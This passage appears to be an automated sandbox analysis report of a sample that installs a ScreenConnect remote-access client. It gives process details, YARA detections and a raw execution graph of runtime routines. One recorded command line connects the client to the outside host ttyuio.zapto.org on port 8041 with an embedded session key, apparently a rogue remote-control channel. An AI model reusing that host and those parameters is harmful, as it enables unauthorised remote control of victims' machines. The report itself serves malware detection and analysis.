                                                                                                                                                                                                                Start time:00:16:17
                                                                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                Start time:00:16:17
                                                                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7140 -ip 7140
                                                                                                                                                                                                                Imagebase:0xfb0000
                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                Start time:00:16:18
                                                                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 884
                                                                                                                                                                                                                Imagebase:0xfb0000
                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                Start time:00:16:18
                                                                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                Start time:00:16:41
                                                                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                Imagebase:0x100000
                                                                                                                                                                                                                File size:601'376 bytes
                                                                                                                                                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1965529685.0000000002397000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                Start time:00:16:41
                                                                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                Imagebase:0xc10000
                                                                                                                                                                                                                File size:95'520 bytes
                                                                                                                                                                                                                MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                Start time:00:16:42
                                                                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                Imagebase:0xc10000
                                                                                                                                                                                                                File size:95'520 bytes
                                                                                                                                                                                                                MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                Start time:00:16:42
                                                                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "d21d76fd-518c-4e0e-8974-ad827e70c72a" "User"
                                                                                                                                                                                                                Imagebase:0xfc0000
                                                                                                                                                                                                                File size:601'376 bytes
                                                                                                                                                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                Start time:00:16:44
                                                                                                                                                                                                                Start date:02/10/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "ebaebc1a-63a2-4828-be16-c29c94055c3f" "System"
                                                                                                                                                                                                                Imagebase:0xbd0000
                                                                                                                                                                                                                File size:601'376 bytes
                                                                                                                                                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                  Execution Coverage:2.3%
                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                  Signature Coverage:3.1%
                                                                                                                                                                                                                  Total number of Nodes:1456
                                                                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                                                                  execution_graph 5888 5e7d1c 5889 5e522b 46 API calls 5888->5889 5890 5e7d21 5889->5890 5609 5e365d 5612 5e3e89 5609->5612 5613 5e3e95 _abort 5612->5613 5614 5e4424 _abort 33 API calls 5613->5614 5617 5e3e9a 5614->5617 5615 5e3f24 _abort 33 API calls 5616 5e3ec4 5615->5616 5617->5615 5891 5e7419 5901 5e7fb2 5891->5901 5895 5e7426 5914 5e828e 5895->5914 5898 5e7450 5899 5e4869 _free 15 API calls 5898->5899 5900 5e745b 5899->5900 5918 5e7fbb 5901->5918 5903 5e7421 5904 5e81ee 5903->5904 5905 5e81fa ___scrt_is_nonwritable_in_current_image 5904->5905 5938 5e56e2 EnterCriticalSection 5905->5938 5907 5e8270 5952 5e8285 5907->5952 5909 5e8205 5909->5907 5911 5e8244 DeleteCriticalSection 5909->5911 5939 5e901c 5909->5939 5910 5e827c _abort 5910->5895 5912 5e4869 _free 15 API calls 5911->5912 5912->5909 5915 5e7435 DeleteCriticalSection 5914->5915 5916 5e82a4 5914->5916 5915->5895 5915->5898 5916->5915 5917 5e4869 _free 15 API calls 5916->5917 5917->5915 5919 5e7fc7 ___scrt_is_nonwritable_in_current_image 5918->5919 5928 5e56e2 EnterCriticalSection 5919->5928 5921 5e806a 5933 5e808a 5921->5933 5925 5e7fd6 5925->5921 5927 5e7f6b 61 API calls 5925->5927 5929 5e7465 EnterCriticalSection 5925->5929 5930 5e8060 5925->5930 5926 5e8076 _abort 5926->5903 5927->5925 5928->5925 5929->5925 5936 5e7479 LeaveCriticalSection 5930->5936 5932 5e8068 5932->5925 5937 5e572a LeaveCriticalSection 5933->5937 5935 5e8091 5935->5926 5936->5932 5937->5935 5938->5909 5940 5e9028 ___scrt_is_nonwritable_in_current_image 5939->5940 5941 5e904e 5940->5941 5942 5e9039 5940->5942 5944 5e9049 _abort 5941->5944 5955 5e7465 EnterCriticalSection 5941->5955 5943 5e47f9 _free 15 API calls 5942->5943 5945 5e903e 5943->5945 5944->5909 5947 5e473d _abort 21 API calls 5945->5947 5947->5944 5948 5e906a 5956 5e8fa6 5948->5956 5950 5e9075 5972 5e9092 5950->5972 6210 5e572a LeaveCriticalSection 5952->6210 5954 5e828c 5954->5910 5955->5948 5957 5e8fc8 5956->5957 5958 5e8fb3 5956->5958 5962 5e8fc3 5957->5962 5975 5e7f05 5957->5975 5959 5e47f9 _free 15 API calls 5958->5959 5961 5e8fb8 5959->5961 5964 5e473d _abort 21 API calls 5961->5964 5962->5950 5964->5962 5965 5e828e 15 API calls 5966 5e8fe4 5965->5966 5981 5e732b 5966->5981 5968 5e8fea 5988 5e9d4e 5968->5988 5971 5e4869 _free 15 API calls 5971->5962 6209 5e7479 LeaveCriticalSection 5972->6209 5974 5e909a 5974->5944 5976 5e7f1d 5975->5976 5977 5e7f19 5975->5977 5976->5977 5978 5e732b 21 API calls 5976->5978 5977->5965 5979 5e7f3d 5978->5979 6003 5e89a7 5979->6003 5982 5e734c 5981->5982 5983 5e7337 5981->5983 5982->5968 5984 5e47f9 _free 15 API calls 5983->5984 5985 5e733c 5984->5985 5986 5e473d _abort 21 API calls 5985->5986 5987 5e7347 5986->5987 5987->5968 5989 5e9d5d 5988->5989 5990 5e9d72 5988->5990 5991 5e47e6 __dosmaperr 15 API calls 5989->5991 5992 5e9dad 5990->5992 5997 5e9d99 5990->5997 5994 5e9d62 5991->5994 5993 5e47e6 __dosmaperr 15 API calls 5992->5993 5995 5e9db2 5993->5995 5996 5e47f9 _free 15 API calls 5994->5996 5998 5e47f9 _free 15 API calls 5995->5998 6001 5e8ff0 5996->6001 6166 5e9d26 5997->6166 6000 5e9dba 5998->6000 6002 5e473d _abort 21 API calls 6000->6002 6001->5962 6001->5971 6002->6001 6004 5e89b3 ___scrt_is_nonwritable_in_current_image 6003->6004 6005 5e89bb 6004->6005 6006 5e89d3 6004->6006 6028 5e47e6 6005->6028 6008 5e8a71 6006->6008 6012 5e8a08 6006->6012 6010 5e47e6 __dosmaperr 15 API calls 6008->6010 6013 5e8a76 6010->6013 6011 5e47f9 _free 15 API calls 6014 5e89c8 _abort 6011->6014 6031 5e5d23 EnterCriticalSection 6012->6031 6016 5e47f9 _free 15 API calls 6013->6016 6014->5977 6018 5e8a7e 6016->6018 6017 5e8a0e 6019 5e8a3f 6017->6019 6020 5e8a2a 6017->6020 6021 5e473d _abort 21 API calls 6018->6021 6032 5e8a92 6019->6032 6023 5e47f9 _free 15 API calls 6020->6023 6021->6014 6025 5e8a2f 6023->6025 6024 5e8a3a 6081 5e8a69 6024->6081 6026 5e47e6 __dosmaperr 15 API calls 6025->6026 6026->6024 6029 5e44a8 __dosmaperr 15 API calls 6028->6029 6030 5e47eb 6029->6030 6030->6011 6031->6017 6033 5e8ac0 6032->6033 6063 5e8ab9 _ValidateLocalCookies 6032->6063 6034 5e8ac4 6033->6034 6035 5e8ae3 6033->6035 6036 5e47e6 __dosmaperr 15 API calls 6034->6036 6038 5e8b34 6035->6038 6039 5e8b17 6035->6039 6037 5e8ac9 6036->6037 6040 5e47f9 _free 15 API calls 6037->6040 6041 5e8b4a 6038->6041 6084 5e8f8b 6038->6084 6042 5e47e6 __dosmaperr 15 API calls 6039->6042 6043 5e8ad0 6040->6043 6087 5e8637 6041->6087 6046 5e8b1c 6042->6046 6047 5e473d _abort 21 API calls 6043->6047 6049 5e47f9 _free 15 API calls 6046->6049 6047->6063 6052 5e8b24 6049->6052 6050 5e8b58 6055 5e8b7e 6050->6055 6056 5e8b5c 6050->6056 6051 5e8b91 6053 5e8beb WriteFile 6051->6053 6054 5e8ba5 6051->6054 6057 5e473d _abort 21 API calls 6052->6057 6061 5e8c0e GetLastError 6053->6061 6068 5e8b74 6053->6068 6058 5e8bad 6054->6058 6059 5e8bdb 6054->6059 6099 5e8417 GetConsoleCP 6055->6099 6060 5e8c52 6056->6060 6094 5e85ca 6056->6094 6057->6063 6064 5e8bcb 6058->6064 6065 5e8bb2 6058->6065 6119 5e86ad 6059->6119 6060->6063 6069 5e47f9 _free 15 API calls 6060->6069 6061->6068 6063->6024 6113 5e887a 6064->6113 6065->6060 6108 5e878c 6065->6108 6068->6060 6068->6063 6072 5e8c2e 6068->6072 6071 5e8c77 6069->6071 6074 5e47e6 __dosmaperr 15 API calls 6071->6074 6075 5e8c49 6072->6075 6076 5e8c35 6072->6076 6074->6063 6124 5e47c3 6075->6124 6077 5e47f9 _free 15 API calls 6076->6077 6079 5e8c3a 6077->6079 6080 5e47e6 __dosmaperr 15 API calls 6079->6080 6080->6063 6165 5e5d46 LeaveCriticalSection 6081->6165 6083 5e8a6f 6083->6014 6129 5e8f0d 6084->6129 6151 5e7eaf 6087->6151 6089 5e8647 6090 5e864c 6089->6090 6091 5e4424 _abort 33 API calls 6089->6091 6090->6050 6090->6051 6093 5e866f 6091->6093 6092 5e868d GetConsoleMode 6092->6090 6093->6090 6093->6092 6095 5e8624 6094->6095 6098 5e85ef 6094->6098 6095->6068 6096 5e9101 WriteConsoleW CreateFileW 6096->6098 6097 5e8626 GetLastError 6097->6095 6098->6095 6098->6096 6098->6097 6100 5e847a 6099->6100 6101 5e858c _ValidateLocalCookies 6099->6101 6100->6101 6103 5e8500 WideCharToMultiByte 6100->6103 6105 5e72b7 35 API calls __fassign 6100->6105 6107 5e8557 WriteFile 6100->6107 6160 5e6052 6100->6160 6101->6068 6103->6101 6104 5e8526 WriteFile 6103->6104 6104->6100 6106 5e85af GetLastError 6104->6106 6105->6100 6106->6101 6107->6100 6107->6106 6109 5e879b 6108->6109 6110 5e8819 WriteFile 6109->6110 6111 5e885d _ValidateLocalCookies 6109->6111 6110->6109 6112 5e885f GetLastError 6110->6112 6111->6068 6112->6111 6118 5e8889 6113->6118 6114 5e8994 _ValidateLocalCookies 6114->6068 6115 5e890b WideCharToMultiByte 6116 5e898c GetLastError 6115->6116 6117 5e8940 WriteFile 6115->6117 6116->6114 6117->6116 6117->6118 6118->6114 6118->6115 6118->6117 6122 5e86bc 6119->6122 6120 5e876f _ValidateLocalCookies 6120->6068 6121 5e872e WriteFile 6121->6122 6123 5e8771 GetLastError 6121->6123 6122->6120 6122->6121 6123->6120 6125 5e47e6 __dosmaperr 15 API calls 6124->6125 6126 5e47ce _free 6125->6126 6127 5e47f9 _free 15 API calls 6126->6127 6128 5e47e1 6127->6128 6128->6063 6138 5e5dfa 6129->6138 6131 5e8f1f 6132 5e8f38 SetFilePointerEx 6131->6132 6133 5e8f27 6131->6133 6135 5e8f50 GetLastError 6132->6135 6136 5e8f2c 6132->6136 6134 5e47f9 _free 15 API calls 6133->6134 6134->6136 6137 5e47c3 __dosmaperr 15 API calls 6135->6137 6136->6041 6137->6136 6139 5e5e07 6138->6139 6141 5e5e1c 6138->6141 6140 5e47e6 __dosmaperr 15 API calls 6139->6140 6143 5e5e0c 6140->6143 6142 5e47e6 __dosmaperr 15 API calls 6141->6142 6146 5e5e41 6141->6146 6144 5e5e4c 6142->6144 6145 5e47f9 _free 15 API calls 6143->6145 6147 5e47f9 _free 15 API calls 6144->6147 6148 5e5e14 6145->6148 6146->6131 6149 5e5e54 6147->6149 6148->6131 6150 5e473d _abort 21 API calls 6149->6150 6150->6148 6152 5e7ebc 6151->6152 6153 5e7ec9 6151->6153 6154 5e47f9 _free 15 API calls 6152->6154 6156 5e7ed5 6153->6156 6157 5e47f9 _free 15 API calls 6153->6157 6155 5e7ec1 6154->6155 6155->6089 6156->6089 6158 5e7ef6 6157->6158 6159 5e473d _abort 21 API calls 6158->6159 6159->6155 6161 5e4424 _abort 33 API calls 6160->6161 6162 5e605d 6161->6162 6163 5e72d1 __fassign 33 API calls 6162->6163 6164 5e606d 6163->6164 6164->6100 6165->6083 6169 5e9ca4 6166->6169 6168 5e9d4a 6168->6001 6170 5e9cb0 ___scrt_is_nonwritable_in_current_image 6169->6170 6180 5e5d23 EnterCriticalSection 6170->6180 6172 5e9cbe 6173 5e9ce5 6172->6173 6174 5e9cf0 6172->6174 6181 5e9dcd 6173->6181 6176 5e47f9 _free 15 API calls 6174->6176 6177 5e9ceb 6176->6177 6196 5e9d1a 6177->6196 6179 5e9d0d _abort 6179->6168 6180->6172 6182 5e5dfa 21 API calls 6181->6182 6183 5e9ddd 6182->6183 6184 5e9de3 6183->6184 6186 5e9e15 6183->6186 6188 5e5dfa 21 API calls 6183->6188 6199 5e5d69 6184->6199 6186->6184 6189 5e5dfa 21 API calls 6186->6189 6191 5e9e0c 6188->6191 6192 5e9e21 CloseHandle 6189->6192 6190 5e9e5d 6190->6177 6194 5e5dfa 21 API calls 6191->6194 6192->6184 6195 5e9e2d GetLastError 6192->6195 6193 5e47c3 __dosmaperr 15 API calls 6193->6190 6194->6186 6195->6184 6208 5e5d46 LeaveCriticalSection 6196->6208 6198 5e9d24 6198->6179 6200 5e5ddf 6199->6200 6203 5e5d78 6199->6203 6201 5e47f9 _free 15 API calls 6200->6201 6202 5e5de4 6201->6202 6204 5e47e6 __dosmaperr 15 API calls 6202->6204 6203->6200 6207 5e5da2 6203->6207 6205 5e5dcf 6204->6205 6205->6190 6205->6193 6206 5e5dc9 SetStdHandle 6206->6205 6207->6205 6207->6206 6208->6198 6209->5974 6210->5954 5618 5e2f53 5619 5e2f7e 5618->5619 5620 5e2f62 5618->5620 5621 5e522b 46 API calls 5619->5621 5620->5619 5622 5e2f68 5620->5622 5623 5e2f85 GetModuleFileNameA 5621->5623 5624 5e47f9 _free 15 API calls 5622->5624 5625 5e2fa9 5623->5625 5626 5e2f6d 5624->5626 5641 5e3077 5625->5641 5627 5e473d _abort 21 API calls 5626->5627 5629 5e2f77 5627->5629 5633 5e2fdc 5635 5e47f9 _free 15 API calls 5633->5635 5634 5e2fe8 5636 5e3077 33 API calls 5634->5636 5640 5e2fe1 5635->5640 5637 5e2ffe 5636->5637 5639 5e4869 _free 15 API calls 5637->5639 5637->5640 5638 5e4869 _free 15 API calls 5638->5629 5639->5640 5640->5638 5643 5e309c 5641->5643 5642 5e55b6 33 API calls 5642->5643 5643->5642 5645 5e30fc 5643->5645 5644 5e2fc6 5647 5e31ec 5644->5647 5645->5644 5646 5e55b6 33 API calls 5645->5646 5646->5645 5648 5e3201 5647->5648 5649 5e2fd3 5647->5649 5648->5649 5650 5e480c _abort 15 API calls 5648->5650 5649->5633 5649->5634 5651 5e322f 5650->5651 5652 5e4869 _free 15 API calls 5651->5652 5652->5649 6561 5e6893 GetProcessHeap 6211 5e7a10 6214 5e7a27 6211->6214 6215 5e7a49 6214->6215 6216 5e7a35 6214->6216 6218 5e7a63 6215->6218 6219 5e7a51 6215->6219 6217 5e47f9 _free 15 API calls 6216->6217 6220 5e7a3a 6217->6220 6222 5e3f72 __fassign 33 API calls 6218->6222 6225 5e7a22 6218->6225 6221 5e47f9 _free 15 API calls 6219->6221 6223 5e473d _abort 21 API calls 6220->6223 6224 5e7a56 6221->6224 6222->6225 6223->6225 6226 5e473d _abort 21 API calls 6224->6226 6226->6225 6365 5e5fd0 6366 5e5fdc ___scrt_is_nonwritable_in_current_image 6365->6366 6377 5e56e2 EnterCriticalSection 6366->6377 6368 5e5fe3 6378 5e5c8b 6368->6378 6370 5e5ff2 6376 5e6001 6370->6376 6391 5e5e64 GetStartupInfoW 6370->6391 6375 5e6012 _abort 6402 5e601d 6376->6402 6377->6368 6379 5e5c97 ___scrt_is_nonwritable_in_current_image 6378->6379 6380 5e5cbb 6379->6380 6381 5e5ca4 6379->6381 6405 5e56e2 EnterCriticalSection 6380->6405 6382 5e47f9 _free 15 API calls 6381->6382 6384 5e5ca9 6382->6384 6385 5e473d _abort 21 API calls 6384->6385 6387 5e5cb3 _abort 6385->6387 6387->6370 6388 5e5cc7 6390 5e5cf3 6388->6390 6406 5e5bdc 6388->6406 6413 5e5d1a 6390->6413 6392 5e5f13 6391->6392 6393 5e5e81 6391->6393 6397 5e5f1a 6392->6397 6393->6392 6394 5e5c8b 22 API calls 6393->6394 6395 5e5eaa 6394->6395 6395->6392 6396 5e5ed8 GetFileType 6395->6396 6396->6395 6398 5e5f21 6397->6398 6399 5e5f64 GetStdHandle 6398->6399 6400 5e5fcc 6398->6400 6401 5e5f77 GetFileType 6398->6401 6399->6398 6400->6376 6401->6398 6417 5e572a LeaveCriticalSection 6402->6417 6404 5e6024 6404->6375 6405->6388 6407 5e480c _abort 15 API calls 6406->6407 6409 5e5bee 6407->6409 6408 5e5bfb 6410 5e4869 _free 15 API calls 6408->6410 6409->6408 6411 5e59b3 6 API calls 6409->6411 6412 5e5c4d 6410->6412 6411->6409 6412->6388 6416 5e572a LeaveCriticalSection 6413->6416 6415 5e5d21 6415->6387 6416->6415 6417->6404 5653 5e7351 5654 5e735e 5653->5654 5655 5e480c _abort 15 API calls 5654->5655 5656 5e7378 5655->5656 5657 5e4869 _free 15 API calls 5656->5657 5658 5e7384 5657->5658 5659 5e480c _abort 15 API calls 5658->5659 5663 5e73aa 5658->5663 5661 5e739e 5659->5661 5662 5e4869 _free 15 API calls 5661->5662 5662->5663 5664 5e73b6 5663->5664 5665 5e59b3 5663->5665 5666 5e5741 _abort 5 API calls 5665->5666 5667 5e59da 5666->5667 5668 5e59f8 InitializeCriticalSectionAndSpinCount 5667->5668 5669 5e59e3 _ValidateLocalCookies 5667->5669 5668->5669 5669->5663 6418 5e55ce GetCommandLineA GetCommandLineW 6227 5e430f 6228 5e432a 6227->6228 6229 5e431a 6227->6229 6233 5e4330 6229->6233 6232 5e4869 _free 15 API calls 6232->6228 6234 5e4349 6233->6234 6235 5e4343 6233->6235 6237 5e4869 _free 15 API calls 6234->6237 6236 5e4869 _free 15 API calls 6235->6236 6236->6234 6238 5e4355 6237->6238 6239 5e4869 _free 15 API calls 6238->6239 6240 5e4360 6239->6240 6241 5e4869 _free 15 API calls 6240->6241 6242 5e436b 6241->6242 6243 5e4869 _free 15 API calls 6242->6243 6244 5e4376 6243->6244 6245 5e4869 _free 15 API calls 6244->6245 6246 5e4381 6245->6246 6247 5e4869 _free 15 API calls 6246->6247 6248 5e438c 6247->6248 6249 5e4869 _free 15 API calls 6248->6249 6250 5e4397 6249->6250 6251 5e4869 _free 15 API calls 6250->6251 6252 5e43a2 6251->6252 6253 5e4869 _free 15 API calls 6252->6253 6254 5e43b0 6253->6254 6259 5e41f6 6254->6259 6265 5e4102 6259->6265 6261 5e421a 6262 5e4246 6261->6262 6278 5e4163 6262->6278 6264 5e426a 6264->6232 6266 5e410e ___scrt_is_nonwritable_in_current_image 6265->6266 6273 5e56e2 EnterCriticalSection 6266->6273 6268 5e4142 6274 5e4157 6268->6274 6270 5e414f _abort 6270->6261 6271 5e4118 6271->6268 6272 5e4869 _free 15 API calls 6271->6272 6272->6268 6273->6271 6277 5e572a LeaveCriticalSection 6274->6277 6276 5e4161 6276->6270 6277->6276 6279 5e416f ___scrt_is_nonwritable_in_current_image 6278->6279 6286 5e56e2 EnterCriticalSection 6279->6286 6281 5e4179 6282 5e43d9 _abort 15 API calls 6281->6282 6283 5e418c 6282->6283 6287 5e41a2 6283->6287 6285 5e419a _abort 6285->6264 6286->6281 6290 5e572a LeaveCriticalSection 6287->6290 6289 5e41ac 6289->6285 6290->6289 6562 5e3d8f 6564 5e3d9e 6562->6564 6567 5e3db2 6562->6567 6563 5e4869 _free 15 API calls 6566 5e3dc4 6563->6566 6565 5e4869 _free 15 API calls 6564->6565 6564->6567 6565->6567 6568 5e4869 _free 15 API calls 6566->6568 6567->6563 6569 5e3dd7 6568->6569 6570 5e4869 _free 15 API calls 6569->6570 6571 5e3de8 6570->6571 6572 5e4869 _free 15 API calls 6571->6572 6573 5e3df9 6572->6573 4893 5e130d 4894 5e1319 ___scrt_is_nonwritable_in_current_image 4893->4894 4921 5e162b 4894->4921 4896 5e1320 4897 5e1473 4896->4897 4909 5e134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 4896->4909 4973 5e191f IsProcessorFeaturePresent 4897->4973 4899 5e147a 4900 5e1480 4899->4900 4977 5e37e1 4899->4977 4980 5e3793 4900->4980 4904 5e1369 4905 5e13ea 4929 5e1a34 4905->4929 4909->4904 4909->4905 4958 5e37a9 4909->4958 4913 5e1405 4964 5e1a6a GetModuleHandleW 4913->4964 4916 5e1410 4917 5e1419 4916->4917 4966 5e3784 4916->4966 4969 5e179c 4917->4969 4922 5e1634 4921->4922 4983 5e1bd4 IsProcessorFeaturePresent 4922->4983 4926 5e1645 4927 5e1649 4926->4927 4993 5e1f7d 4926->4993 